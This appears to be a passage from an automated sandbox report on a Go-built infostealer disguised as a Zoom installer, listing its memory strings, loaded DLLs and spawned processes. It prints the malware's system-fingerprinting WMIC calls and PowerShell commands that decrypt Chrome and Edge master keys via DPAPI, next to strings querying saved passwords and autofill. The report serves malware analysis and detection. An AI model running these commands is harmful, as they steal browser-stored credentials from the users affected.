    Source: powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49970 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49980
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknown | Network traffic detected: HTTP traffic on port 49980 -> 443
    Source: ZoomInstaller.exe, 00000000.00000002.2809918289.00007FF6C414E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: github.com/lxn/win.getRawInputDatamemstr_920ec209-c
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD34763EF8
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD34762688
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD34763B9D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD34763AFB
    Source: ZoomInstaller.exe | Static PE information: Number of sections : 24 > 10
    Source: ZoomInstaller.exe, 00000000.00000002.2809918289.00007FF6C414E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
    Source: ZoomInstaller.exe | Binary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
    Source: classification engine | Classification label: mal76.troj.spyw.evad.winEXE@28/27@4/3
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File created: C:\Users\user\AppData\Local\Ailurophile
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4256:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upcrjvg1.r0x.ps1
    Source: ZoomInstaller.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000344000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000344000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;PRAGMA locking_mode = NORMAL;PRAGMA synchronous = NORMAL;
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
    Source: ZoomInstaller.exe, 00000000.00000003.2745006744.000002A27BF88000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.2744692313.000002A27BFB2000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003B7000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.2744818712.000002A27BF88000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003C5000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.2745103919.000002A27BF88000.00000004.00000020.00020000.00000000.sdmp, passwords.db0.0.dr, passwords.db.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
    Source: ZoomInstaller.exe | String found in binary or memory: failed to construct HKDF label: %sCM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key size2006-01-02T15:04:05.999999999Z07:00unpaired removeDep: no %T dep on %Tencoding/hex: odd length hex string2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00Non-function passed to RegisterFunc'_' must separate successive digitsform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=network dropped connection on resettransport endpoint is not connectedhash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9" is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qtoo many Questions to pack (>65535)file type does not support deadlineunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizeP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferecb85da208ccedcda3abcbadadfb5fb91423cc98009cc670a9423fd9472b78d5727fbdb18cad2624ace4f40c34ea4b25ed4f06096b5e8cbf70c74380253b0ce5babaf95cd02b767d868ff87e042ab8ab4a2ab596c8cb97fa4249cd843fe7bc726f1bef30912dbabb142ff299crypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0name %q does not begin with a lettersql: converting argument %s type: %wconverting NULL to %s is unsupportedjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after
Source: ZoomInstaller.exe | String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: ZoomInstaller.exe | String found in binary or memory: -stopTimer
Source: ZoomInstaller.exe | String found in binary or memory: -addr
Source: ZoomInstaller.exe | String found in binary or memory: -stop
Source: ZoomInstaller.exe | String found in binary or memory: -start
Source: ZoomInstaller.exe | String found in binary or memory: ,-stop
Source: ZoomInstaller.exe | String found in binary or memory: -addrs
Source: ZoomInstaller.exe | String found in binary or memory: /0-addrs
Source: ZoomInstaller.exe | String found in binary or memory: 70-addrs
Source: unknown | Process created: C:\Users\user\Desktop\ZoomInstaller.exe "C:\Users\user\Desktop\ZoomInstaller.exe"
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\tasklist.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
